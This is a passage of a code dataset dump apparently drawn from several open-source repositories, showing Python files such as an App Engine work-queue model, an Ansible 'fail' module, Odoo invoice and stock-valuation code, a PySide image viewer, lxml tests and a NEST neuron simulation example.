with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# * Neither the name of Google Inc. nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nfrom google.appengine.ext import db\n\nfrom datetime import timedelta, datetime\nimport time\n\nfrom model.queuepropertymixin import QueuePropertyMixin\n\n\nclass ActiveWorkItems(db.Model, QueuePropertyMixin):\n queue_name = db.StringProperty()\n item_ids = db.ListProperty(int)\n item_dates = db.ListProperty(float)\n date = db.DateTimeProperty(auto_now_add=True)\n\n # The id/date pairs should probably just be their own class.\n def _item_time_pairs(self):\n return zip(self.item_ids, self.item_dates)\n\n def _set_item_time_pairs(self, pairs):\n if pairs:\n # The * operator raises on an empty list.\n # db.Model does not tuples, we have to make lists.\n self.item_ids, self.item_dates = map(list, zip(*pairs))\n else:\n self.item_ids = []\n self.item_dates = []\n\n def _append_item_time_pair(self, pair):\n self.item_ids.append(pair[0])\n self.item_dates.append(pair[1])\n\n def _remove_item(self, item_id):\n nonexpired_pairs = [pair for pair in self._item_time_pairs() if pair[0] != item_id]\n self._set_item_time_pairs(nonexpired_pairs)\n\n @classmethod\n def key_for_queue(cls, queue_name):\n return \"active-work-items-%s\" % (queue_name)\n\n @classmethod\n def lookup_by_queue(cls, queue_name):\n return cls.get_or_insert(key_name=cls.key_for_queue(queue_name), queue_name=queue_name)\n\n @staticmethod\n def _expire_item(key, item_id):\n active_work_items = db.get(key)\n active_work_items._remove_item(item_id)\n active_work_items.put()\n\n def expire_item(self, item_id):\n return db.run_in_transaction(self._expire_item, self.key(), item_id)\n\n def deactivate_expired(self, now):\n one_hour_ago = time.mktime((now - timedelta(minutes=60)).timetuple())\n nonexpired_pairs = [pair for pair in self._item_time_pairs() if pair[1] > one_hour_ago]\n self._set_item_time_pairs(nonexpired_pairs)\n\n def next_item(self, work_item_ids, now):\n for item_id in work_item_ids:\n if item_id not in self.item_ids:\n self._append_item_time_pair([item_id, time.mktime(now.timetuple())])\n return item_id\n return None\n\n def time_for_item(self, item_id):\n for active_item_id, time in self._item_time_pairs():\n if active_item_id == item_id:\n return datetime.fromtimestamp(time)\n return None\n"},"license":{"kind":"string","value":"bsd-3-clause"}}},{"rowIdx":2462,"cells":{"repo_name":{"kind":"string","value":"ritzk/ansible-modules-core"},"path":{"kind":"string","value":"utilities/logic/fail.py"},"copies":{"kind":"string","value":"198"},"size":{"kind":"string","value":"1458"},"content":{"kind":"string","value":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright 2012 Dag Wieers \n#\n# This file is part of Ansible\n#\n# Ansible is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Ansible is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Ansible. If not, see .\n\nDOCUMENTATION = '''\n---\nmodule: fail\nshort_description: Fail with custom message\ndescription:\n - This module fails the progress with a custom message. It can be\n useful for bailing out when a certain condition is met using C(when).\nversion_added: \"0.8\"\noptions:\n msg:\n description:\n - The customized message used for failing execution. If omitted,\n fail will simple bail out with a generic message.\n required: false\n default: \"'Failed as requested from task'\"\n\nauthor: \"Dag Wieers (@dagwieers)\"\n'''\n\nEXAMPLES = '''\n# Example playbook using fail and when together\n- fail: msg=\"The system may not be provisioned according to the CMDB status.\"\n when: cmdb_status != \"to-be-staged\"\n'''\n"},"license":{"kind":"string","value":"gpl-3.0"}}},{"rowIdx":2463,"cells":{"repo_name":{"kind":"string","value":"vivisect/synapse"},"path":{"kind":"string","value":"synapse/tools/pushfile.py"},"copies":{"kind":"string","value":"1"},"size":{"kind":"string","value":"1334"},"content":{"kind":"string","value":"import os\nimport sys\nimport argparse\n\nimport synapse.telepath as s_telepath\n\nimport synapse.lib.output as s_output\n\ndef getArgParser():\n p = argparse.ArgumentParser()\n p.add_argument('cortex', help='telepath URL for a target cortex')\n p.add_argument('filenames', nargs='+', help='files to upload')\n p.add_argument('--tags', help='comma separated list of tags to add to the nodes')\n return p\n\ndef main(argv, outp=None):\n\n if outp is None: # pragma: no cover\n outp = s_output.OutPut()\n\n p = getArgParser()\n opts = p.parse_args(argv)\n\n core = s_telepath.openurl(opts.cortex)\n\n tags = []\n if opts.tags:\n for tag in opts.tags.split(','):\n tags.append(tag)\n\n if tags:\n outp.printf('adding tags: %r' % (tags,))\n\n for path in opts.filenames:\n\n with open(path, 'rb') as fd:\n\n base = os.path.basename(path)\n node = core.formNodeByFd(fd, name=base)\n\n core.addTufoTags(node, tags)\n\n iden = node[1].get('file:bytes')\n size = node[1].get('file:bytes:size')\n name = node[1].get('file:bytes:name')\n\n outp.printf('file: %s (%d) added (%s) as %s' % (base, size, iden, name))\n\n core.fini() # Shut down the proxy\n\nif __name__ == '__main__': # pragma: no cover\n sys.exit(main(sys.argv[1:]))\n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2464,"cells":{"repo_name":{"kind":"string","value":"StefanRijnhart/odoomrp-wip"},"path":{"kind":"string","value":"account_treasury_forecast/wizard/wiz_create_invoice.py"},"copies":{"kind":"string","value":"31"},"size":{"kind":"string","value":"2577"},"content":{"kind":"string","value":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see http://www.gnu.org/licenses/.\n#\n##############################################################################\n\nimport openerp.addons.decimal_precision as dp\nfrom openerp import models, fields, api\n\n\nclass WizCreateInvoice(models.TransientModel):\n _name = 'wiz.create.invoice'\n _description = 'Wizard to create invoices'\n\n partner_id = fields.Many2one(\"res.partner\", string=\"Partner\")\n journal_id = fields.Many2one(\"account.journal\", string=\"Journal\",\n domain=[(\"type\", \"=\", \"purchase\")])\n description = fields.Char(string=\"Description\")\n amount = fields.Float(string=\"Amount\",\n digits_compute=dp.get_precision('Account'))\n line_id = fields.Many2one(\"account.treasury.forecast.line.template\",\n string=\"Payment\")\n\n @api.one\n def button_create_inv(self):\n invoice_obj = self.env['account.invoice']\n res_inv = invoice_obj.onchange_partner_id('in_invoice',\n self.partner_id.id)\n values = res_inv['value']\n values['name'] = ('Treasury: ' + self.description + '/ Amount: ' +\n str(self.amount))\n values['reference'] = ('Treasury: ' + self.description + '/ Amount: ' +\n str(self.amount))\n values['partner_id'] = self.partner_id.id\n values['journal_id'] = self.journal_id.id\n values['type'] = 'in_invoice'\n invoice_id = invoice_obj.create(values)\n self.line_id.write({'invoice_id': invoice_id.id, 'paid': 1,\n 'journal_id': self.journal_id.id,\n 'partner_id': self.partner_id.id,\n 'amount': self.amount})\n return {'type': 'ir.actions.act_window_close'}\n"},"license":{"kind":"string","value":"agpl-3.0"}}},{"rowIdx":2465,"cells":{"repo_name":{"kind":"string","value":"FedoraScientific/salome-paravis"},"path":{"kind":"string","value":"src/PV_SWIG/paravis.py"},"copies":{"kind":"string","value":"1"},"size":{"kind":"string","value":"3020"},"content":{"kind":"string","value":"# Copyright (C) 2010-2014 CEA/DEN, EDF R&D\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n#\n# See http://www.salome-platform.org/ or email : webmaster.salome@opencascade.com\n#\n# File : paravis.py\n# Module : PARAVIS\n#\n\nimport os, new\n\nimport PARAVIS\nimport SALOME\nimport SALOME_Session_idl\nimport SALOMEDS\nimport SALOME_ModuleCatalog\nfrom omniORB import CORBA\nfrom time import sleep\nfrom salome import *\n\nmyORB = None\nmyNamingService = None\nmyLifeCycleCORBA = None\nmyNamingService = None\nmyLocalStudyManager = None\nmyLocalStudy = None\nmyLocalParavis = None\nmyDelay = None\nmySession = None\n\n## Initialization of paravis server\ndef Initialize(theORB, theNamingService, theLifeCycleCORBA, theStudyManager, theStudy, theDelay) :\n global myORB, myNamingService, myLifeCycleCORBA, myLocalStudyManager, myLocalStudy\n global mySession, myDelay\n myDelay = theDelay\n myORB = theORB\n myNamingService = theNamingService\n myLifeCycleCORBA = theLifeCycleCORBA\n myLocalStudyManager = theStudyManager\n while mySession == None:\n mySession = myNamingService.Resolve(\"/Kernel/Session\")\n mySession = mySession._narrow(SALOME.Session)\n mySession.GetInterface()\n myDelay = theDelay\n sleep(myDelay)\n myLocalParavis = myLifeCycleCORBA.FindOrLoadComponent(\"FactoryServer\", \"PARAVIS\")\n myLocalStudy = theStudy\n myLocalParavis.SetCurrentStudy(myLocalStudy)\n myLocalParavis.ActivateModule()\n return myLocalParavis\n\n\ndef ImportFile(theFileName):\n \"Import a file of any format supported by ParaView\"\n myParavis.ImportFile(theFileName)\n\n\ndef createFunction(theName):\n \"Create function - constructor of Paravis object\"\n def MyFunction():\n return myParavis.CreateClass(theName)\n return MyFunction\n\n\ndef createConstructors():\n \"Create constructor functions according to list of extracted classes\"\n g = globals()\n aClassNames = myParavis.GetClassesList();\n for aName in aClassNames:\n g[aName] = createFunction(aName)\n\n## Initialize of a PARAVIS interface \nmyParavis = Initialize(orb, naming_service,lcc,myStudyManager,myStudy, 2)\n\n## Initialize constructor functions\ncreateConstructors()\n\n## Initialize Paravis static objects\nvtkSMObject = vtkSMObject()\nvtkProcessModule = vtkProcessModule()\nvtkPVPythonModule = vtkPVPythonModule()\nvtkSMProxyManager = vtkSMProxyManager()\n\n\n"},"license":{"kind":"string","value":"lgpl-2.1"}}},{"rowIdx":2466,"cells":{"repo_name":{"kind":"string","value":"viktorradnai/screenwarp"},"path":{"kind":"string","value":"utils/create_chessboard.py"},"copies":{"kind":"string","value":"1"},"size":{"kind":"string","value":"2170"},"content":{"kind":"string","value":"#!/usr/bin/python\n\nimport cv2\nimport wand.image\nimport wand.color\nimport wand.drawing\nimport sys\nimport logging\nimport argparse\n\nlogger = logging.getLogger(__name__)\n\ndef parse_cmdline():\n parser = argparse.ArgumentParser(description='''\n TODO: insert description.'''\n )\n parser.add_argument('-v', '--verbose', action='store_true', help=\"Enable verbose output\")\n parser.add_argument('-q', '--quiet', action='store_true', help=\"Output errors only\")\n parser.add_argument('-W', '--width', type=int, help=\"Target screen width. This will be the width of the output image.\", default=1920)\n parser.add_argument('-H', '--height', type=int, help=\"Target screen height. This will be the height of the output image.\", default=1080)\n parser.add_argument('-c', '--cols', type=int, help=\"Number of squares per column\", default=16)\n parser.add_argument('-r', '--rows', type=int, help=\"Number of squares per row\", default=9)\n parser.add_argument('filename', help=\"Image file\")\n args = parser.parse_args()\n\n if args.verbose: loglevel = logging.DEBUG\n elif args.quiet: loglevel = logging.ERROR\n else: loglevel = logging.INFO\n\n logging.basicConfig(level=loglevel, format='%(asctime)s %(levelname)s %(message)s')\n\n return args\n\n\ndef main():\n args = parse_cmdline()\n\n screen_width = args.width\n screen_height = args.height\n square_width = screen_width / args.cols\n square_height = screen_height / args.rows\n\n image = wand.image.Image(width=screen_width, height=screen_height, background=wand.color.Color('#fff'))\n with wand.drawing.Drawing() as draw:\n draw.fill_color = wand.color.Color('#000')\n for r in range(args.rows):\n for c in range(args.cols):\n if not (c + r) % 2:\n continue\n x = square_width * c\n y = square_height * r\n\n logger.debug(\"%s %s %s %s\", x, y, square_width, square_height)\n draw.rectangle(x, y, width=square_width, height=square_height)\n\n draw.draw(image)\n\n image.save(filename=args.filename)\n exit(0)\n\n\n# call main()\nif __name__ == '__main__':\n main()\n"},"license":{"kind":"string","value":"gpl-3.0"}}},{"rowIdx":2467,"cells":{"repo_name":{"kind":"string","value":"lmregus/Portfolio"},"path":{"kind":"string","value":"python/design_patterns/env/lib/python3.7/site-packages/IPython/utils/dir2.py"},"copies":{"kind":"string","value":"3"},"size":{"kind":"string","value":"2232"},"content":{"kind":"string","value":"# encoding: utf-8\n\"\"\"A fancy version of Python's builtin :func:`dir` function.\n\"\"\"\n\n# Copyright (c) IPython Development Team.\n# Distributed under the terms of the Modified BSD License.\n\nimport inspect\nimport types\n\n\ndef safe_hasattr(obj, attr):\n \"\"\"In recent versions of Python, hasattr() only catches AttributeError.\n This catches all errors.\n \"\"\"\n try:\n getattr(obj, attr)\n return True\n except:\n return False\n\n\ndef dir2(obj):\n \"\"\"dir2(obj) -> list of strings\n\n Extended version of the Python builtin dir(), which does a few extra\n checks.\n\n This version is guaranteed to return only a list of true strings, whereas\n dir() returns anything that objects inject into themselves, even if they\n are later not really valid for attribute access (many extension libraries\n have such bugs).\n \"\"\"\n\n # Start building the attribute list via dir(), and then complete it\n # with a few extra special-purpose calls.\n\n try:\n words = set(dir(obj))\n except Exception:\n # TypeError: dir(obj) does not return a list\n words = set()\n\n if safe_hasattr(obj, '__class__'):\n words |= set(dir(obj.__class__))\n\n # filter out non-string attributes which may be stuffed by dir() calls\n # and poor coding in third-party modules\n\n words = [w for w in words if isinstance(w, str)]\n return sorted(words)\n\n\ndef get_real_method(obj, name):\n \"\"\"Like getattr, but with a few extra sanity checks:\n\n - If obj is a class, ignore everything except class methods\n - Check if obj is a proxy that claims to have all attributes\n - Catch attribute access failing with any exception\n - Check that the attribute is a callable object\n\n Returns the method or None.\n \"\"\"\n try:\n canary = getattr(obj, '_ipython_canary_method_should_not_exist_', None)\n except Exception:\n return None\n\n if canary is not None:\n # It claimed to have an attribute it should never have\n return None\n\n try:\n m = getattr(obj, name, None)\n except Exception:\n return None\n\n if inspect.isclass(obj) and not isinstance(m, types.MethodType):\n return None\n\n if callable(m):\n return m\n\n return None\n"},"license":{"kind":"string","value":"mit"}}},{"rowIdx":2468,"cells":{"repo_name":{"kind":"string","value":"Symphonia/Searcher"},"path":{"kind":"string","value":"ImageView.py"},"copies":{"kind":"string","value":"1"},"size":{"kind":"string","value":"4861"},"content":{"kind":"string","value":"from PySide import QtGui, QtCore\nimport sys, os\n\nclass ImageView(QtGui.QWidget):\n\tdef __init__(self,imagelist,parent = None):\n\t\tsuper(ImageView,self).__init__(parent)\n\t\tself.imagesize = None\n\t\tself.mode = ''\n\t\tself.imageList = imagelist[0]\n\t\tself.index = imagelist[1]\n\t\tself.title_label = QtGui.QLabel(self)\n\t\tself.imagesizelabel = QtGui.QLabel(self)\n\t\tself.cursizelabel = QtGui.QLabel(self)\n\t\tself.image_label = QtGui.QLabel(self)\n\t\tself.image_label.setBackgroundRole(QtGui.QPalette.Base)\n\t\tself.image_label.setSizePolicy(QtGui.QSizePolicy.Ignored,QtGui.QSizePolicy.Ignored)\n\t\tself.image_label.setScaledContents(True)\n\t\tself.installEventFilter(self)\n\n\t\tCloseWindowAction = QtGui.QAction(self)\n\t\tCloseWindowAction.setShortcut(\"Ctrl+W\")\n\t\tCloseWindowAction.triggered.connect(self.close)\n\n\t\tself.addAction(CloseWindowAction)\n\n\n\t\tself.scrollarea = QtGui.QScrollArea(self)\n\t\tself.scrollarea.setBackgroundRole(QtGui.QPalette.Dark)\n\t\tself.scrollarea.setWidget(self.image_label)\n\n\t\thbox = QtGui.QHBoxLayout()\n\t\thbox.addWidget(self.imagesizelabel)\n\t\thbox.addWidget(self.title_label)\n\t\thbox.addWidget(self.cursizelabel)\n\t\thbox.setContentsMargins(3,0,3,0)\n\n\t\tqbox = QtGui.QVBoxLayout(self)\n\t\tqbox.addLayout(hbox)\n\t\tqbox.addWidget(self.scrollarea)\n\t\tqbox.setContentsMargins(0,5,0,0)\n\n\t\tinfo = QtCore.QFileInfo(self.imageList[self.index])\n\t\tself.title_label.setText(info.fileName())\n\t\tself.title_label.setAlignment(QtCore.Qt.AlignCenter)\n\t\tself.imagesizelabel.setAlignment(QtCore.Qt.AlignLeft)\n\t\tself.cursizelabel.setAlignment(QtCore.Qt.AlignRight)\n\n\t\tself.setMinimumHeight(10)\n\t\tself.setMinimumWidth(10)\n\t\t\n\t\tself.setWindowTitle('Image Viewer')\n\t\tself.setWindowFlags(QtCore.Qt.FramelessWindowHint)\n\t\tself.setAttribute(QtCore.Qt.WA_DeleteOnClose)\n\t\tself.setGeometry(10,10,500,400)\n\t\tif self.index ==0:\n\t\t\tself.open(self.imageList[0])\n\t\tself.show()\n\n\n\tdef open(self,image_path):\n\t\tif image_path:\n\t\t\timage = QtGui.QImage(image_path)\n\t\t\tif image.isNull():\n\t\t\t\tQtGui.QMessageBox.information(self,\"Image View\",\"Cannot load %s.\" %image_path)\n\t\t\t\treturn\n\t\t\tself.image_label.setPixmap(QtGui.QPixmap.fromImage(image))\n\t\t\tself.scrollarea.setWidgetResizable(True)\n\t\t\tself.imagesize = image.size()\n\t\t\tself.updateTitle()\n\t\t\t\n\n\tdef eventFilter(self,object,event):\n\t\tif event.type() == QtCore.QEvent.KeyRelease:\n\t\t\tif event.key() == QtCore.Qt.Key_Left:\n\t\t\t\tif self.index ==0: self.index = len(self.imageList)\n\t\t\t\tself.index-=1\n\t\t\t\tself.open(self.imageList[self.index])\n\t\t\tif event.key() == QtCore.Qt.Key_Right:\n\t\t\t\tif self.index>=len(self.imageList)-1: self.index =0\n\t\t\t\tself.index+=1\n\t\t\t\tself.open(self.imageList[self.index])\n\t\t\tif event.key() == QtCore.Qt.Key_W:\n\t\t\t\tself.resize(500,400)\n\t\t\tif event.key() == QtCore.Qt.Key_R:\n\t\t\t\tif self.imagesize.height() > QtGui.QDesktopWidget().availableGeometry().height():\n\t\t\t\t\tratio = QtGui.QDesktopWidget().availableGeometry().height() / self.imagesize.height()\n\t\t\t\t\tself.resize(int(self.imagesize.width()*ratio),int(self.imagesize.height()*ratio))\n\t\t\t\telse:\t\n\t\t\t\t\tself.resize(self.imagesize.width(),self.imagesize.height())\n\t\t\tif event.key() == QtCore.Qt.Key_E:\n\t\t\t\tself.move(self.pos().x(),0)\n\t\t\t\tratio = QtGui.QDesktopWidget().availableGeometry().height() / self.imagesize.height()\n\t\t\t\tself.resize(int(self.imagesize.width()*ratio),int(self.imagesize.height()*ratio))\n\t\t\tself.updateTitle()\n\t\t\tif event.key() == QtCore.Qt.Key_Escape:\n\t\t\t\tself.close()\n\t\tif event.type() == QtCore.QEvent.MouseButtonPress:\n\t\t\tif event.pos().x() < self.size().width() -20:\n\t\t\t self.diff = event.globalPos() - self.frameGeometry().topLeft()\n\t\t\t self.mode = 'drag'\n\t\t\telse:\n\t\t\t self.mode = 'resize'\n\t\tif event.type() == QtCore.QEvent.MouseMove:\n\t\t\tif self.mode == 'drag':\n\t\t\t self.move(event.globalPos()-self.diff)\n\t\t\telse:\n\t\t\t self.resize(event.pos().x(),event.pos().y())\n\t\t\t self.updateTitle()\n\t\treturn False\n\t\t\n\n\tdef updateTitle(self):\n\t\tinfo = QtCore.QFileInfo(self.imageList[self.index])\n\t\tself.imagesizelabel.setText(str(self.imagesize.width()) +','+ str(self.imagesize.height()) + ' ->')\n\t\tself.title_label.setText(info.fileName())\n\t\tself.cursizelabel.setText('<- ' + str(self.size().width()) + ',' + str(self.size().height()))\n\n\tdef mousePressEvent(self,event):\n\t\tprint(event.buttons())\n\t\tif event.buttons() == QtCore.Qt.LeftButton:\n\t\t if event.pos().x() < self.size().width() -20:\n\t\t self.diff = event.globalPos() - self.frameGeometry().topLeft()\n\t\t self.mode = 'drag'\n\t\t else:\n\t\t self.mode = 'resize'\n\n\n\tdef mouseMoveEvent(self,event):\n\t if event.buttons() == QtCore.Qt.LeftButton:\n\t if self.mode == 'drag':\n\t self.move(event.globalPos()-self.diff)\n\t else:\n\t self.resize(event.pos().x(),event.pos().y())\n\n\n# def main():\n# app = QtGui.QApplication(sys.argv)\n# imageview = ImageView()\n# sys.exit(app.exec_())\n\n\n# if __name__ == '__main__':\n# main()\n\t\t"},"license":{"kind":"string","value":"mit"}}},{"rowIdx":2469,"cells":{"repo_name":{"kind":"string","value":"hdinsight/hue"},"path":{"kind":"string","value":"desktop/core/ext-py/lxml-3.4.4/src/lxml/html/tests/test_frames.py"},"copies":{"kind":"string","value":"20"},"size":{"kind":"string","value":"1557"},"content":{"kind":"string","value":"import unittest, sys\nfrom lxml.tests.common_imports import make_doctest, doctest\nimport lxml.html\nfrom lxml.html import html_parser, XHTML_NAMESPACE\n\nclass FrameTest(unittest.TestCase):\n\n def test_parse_fragments_fromstring(self):\n parser = lxml.html.HTMLParser(encoding='utf-8', remove_comments=True)\n html = \"\"\"\n \n \"\"\"\n etree_document = lxml.html.fragments_fromstring(html, parser=parser)\n self.assertEqual(len(etree_document), 1)\n root = etree_document[0]\n self.assertEqual(root.tag, \"frameset\")\n frame_element = root[0]\n self.assertEqual(frame_element.tag, 'frame')\n\n def test_parse_fromstring(self):\n parser = lxml.html.HTMLParser(encoding='utf-8', remove_comments=True)\n html = \"\"\"\n \n \"\"\"\n etree_document = lxml.html.fromstring(html, parser=parser)\n self.assertEqual(etree_document.tag, 'html')\n self.assertEqual(len(etree_document), 1)\n frameset_element = etree_document[0]\n self.assertEqual(len(frameset_element), 1)\n frame_element = frameset_element[0]\n self.assertEqual(frame_element.tag, 'frame')\n\n\ndef test_suite():\n loader = unittest.TestLoader()\n return loader.loadTestsFromModule(sys.modules[__name__])"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2470,"cells":{"repo_name":{"kind":"string","value":"Silmathoron/nest-simulator"},"path":{"kind":"string","value":"pynest/examples/if_curve.py"},"copies":{"kind":"string","value":"5"},"size":{"kind":"string","value":"5195"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n#\n# if_curve.py\n#\n# This file is part of NEST.\n#\n# Copyright (C) 2004 The NEST Initiative\n#\n# NEST is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# (at your option) any later version.\n#\n# NEST is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with NEST. If not, see .\n\n\"\"\"IF curve example\n----------------------\n\nThis example illustrates how to measure the I-F curve of a neuron.\nThe program creates a small group of neurons and injects a noisy current\n:math:`I(t) = I_mean + I_std*W(t)`\nwhere :math:`W(t)` is a white noise process.\nThe programm systematically drives the current through a series of values in\nthe two-dimensional `(I_mean, I_std)` space and measures the firing rate of\nthe neurons.\n\nIn this example, we measure the I-F curve of the adaptive exponential\nintegrate and fire neuron (``aeif_cond_exp``), but any other neuron model that\naccepts current inputs is possible. The model and its parameters are\nsupplied when the IF_curve object is created.\n\n\"\"\"\n\nimport numpy\nimport nest\nimport shelve\n\n###############################################################################\n# Here we define which model and the neuron parameters to use for measuring\n# the transfer function.\n\nmodel = 'aeif_cond_exp'\nparams = {'a': 4.0,\n 'b': 80.8,\n 'V_th': -50.4,\n 'Delta_T': 2.0,\n 'I_e': 0.0,\n 'C_m': 281.0,\n 'g_L': 30.0,\n 'V_reset': -70.6,\n 'tau_w': 144.0,\n 't_ref': 5.0,\n 'V_peak': -40.0,\n 'E_L': -70.6,\n 'E_ex': 0.,\n 'E_in': -70.}\n\n\nclass IF_curve():\n\n t_inter_trial = 200. # Interval between two successive measurement trials\n t_sim = 1000. # Duration of a measurement trial\n n_neurons = 100 # Number of neurons\n n_threads = 4 # Nubmer of threads to run the simulation\n\n def __init__(self, model, params=False):\n self.model = model\n self.params = params\n self.build()\n self.connect()\n\n def build(self):\n #######################################################################\n # We reset NEST to delete information from previous simulations\n # and adjust the number of threads.\n\n nest.ResetKernel()\n nest.SetKernelStatus({'local_num_threads': self.n_threads})\n\n #######################################################################\n # We set the default parameters of the neuron model to those\n # defined above and create neurons and devices.\n\n if self.params:\n nest.SetDefaults(self.model, self.params)\n self.neuron = nest.Create(self.model, self.n_neurons)\n self.noise = nest.Create('noise_generator')\n self.spike_detector = nest.Create('spike_detector')\n\n def connect(self):\n #######################################################################\n # We connect the noisy current to the neurons and the neurons to\n # the spike detectors.\n\n nest.Connect(self.noise, self.neuron, 'all_to_all')\n nest.Connect(self.neuron, self.spike_detector, 'all_to_all')\n\n def output_rate(self, mean, std):\n self.build()\n self.connect()\n\n #######################################################################\n # We adjust the parameters of the noise according to the current\n # values.\n\n self.noise.set(mean=mean, std=std, start=0.0, stop=1000., origin=0.)\n\n # We simulate the network and calculate the rate.\n\n nest.Simulate(self.t_sim)\n rate = self.spike_detector.n_events * 1000. / (1. * self.n_neurons * self.t_sim)\n return rate\n\n def compute_transfer(self, i_mean=(400.0, 900.0, 50.0),\n i_std=(0.0, 600.0, 50.0)):\n #######################################################################\n # We loop through all possible combinations of `(I_mean, I_sigma)`\n # and measure the output rate of the neuron.\n\n self.i_range = numpy.arange(*i_mean)\n self.std_range = numpy.arange(*i_std)\n self.rate = numpy.zeros((self.i_range.size, self.std_range.size))\n nest.set_verbosity('M_WARNING')\n for n, i in enumerate(self.i_range):\n print('I = {0}'.format(i))\n for m, std in enumerate(self.std_range):\n self.rate[n, m] = self.output_rate(i, std)\n\n\ntransfer = IF_curve(model, params)\ntransfer.compute_transfer()\n\n###############################################################################\n# After the simulation is finished we store the data into a file for\n# later analysis.\n\nwith shelve.open(model + '_transfer.dat') as dat:\n dat['I_mean'] = transfer.i_range\n dat['I_std'] = transfer.std_range\n dat['rate'] = transfer.rate\n"},"license":{"kind":"string","value":"gpl-2.0"}}},{"rowIdx":2471,"cells":{"repo_name":{"kind":"string","value":"Eficent/odoomrp-wip"},"path":{"kind":"string","value":"stock_quant_valuation/tests/test_stock_quant_valuation.py"},"copies":{"kind":"string","value":"10"},"size":{"kind":"string","value":"2798"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n# (c) 2016 Ainara Galdona - AvanzOSC\n# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html\n\nimport openerp.tests.common as common\nfrom openerp import fields\n\n\nclass TestStockQuantValuation(common.TransactionCase):\n\n def setUp(self):\n super(TestStockQuantValuation, self).setUp()\n self.quant_model = self.env['stock.quant']\n self.hist_model = self.env['stock.history']\n self.location_model = self.env['stock.location']\n self.product = self.env.ref('product.product_product_34')\n self.location = self.location_model.search([('usage', '=',\n 'internal')], limit=1)\n\n def test_quant_valuation(self):\n self.product.sudo().write({'cost_method': 'real',\n 'standard_price': 20,\n 'manual_standard_cost': 35})\n quant = self.quant_model.create(\n {'product_id': self.product.id,\n 'cost': 20,\n 'location_id': self.location.id,\n 'qty': 5})\n self.assertEqual(quant.manual_value, (35 * 5),\n \"Incorrect Manual Value for quant.\")\n self.assertEqual(quant.real_value, (20 * 5),\n \"Incorrect Real Value for quant.\")\n\n def test_stock_history(self):\n hist_line = self.hist_model.search([], limit=1)\n hist_line.product_id.sudo().manual_standard_cost = 40\n self.assertEqual(hist_line.manual_value, (hist_line.quantity * 40),\n \"Incorrect Manual Value for history line.\")\n self.assertEqual(hist_line.real_value,\n (hist_line.quantity * hist_line.price_unit_on_quant),\n \"Incorrect Real Value for history line.\")\n\n def test_stock_history_read_group(self):\n gfields = ['product_id', 'location_id', 'move_id', 'date', 'source',\n 'quantity', 'inventory_value', 'manual_value', 'real_value']\n groupby = ['product_id']\n domain = [('date', '<=', fields.Date.today())]\n res = self.hist_model.read_group(\n domain=domain, fields=gfields, groupby=groupby, offset=0,\n limit=None, orderby=False, lazy=True)\n if res:\n line = res[0]\n line_domain = line.get('__domain', domain)\n group_lines = self.hist_model.search(line_domain)\n sum_real = sum([x.real_value for x in group_lines])\n sum_manual = sum([x.manual_value for x in group_lines])\n self.assertEqual(line['real_value'], sum_real,\n \"Real value not correct sum.\")\n self.assertEqual(line['manual_value'], sum_manual,\n \"Manual value not correct 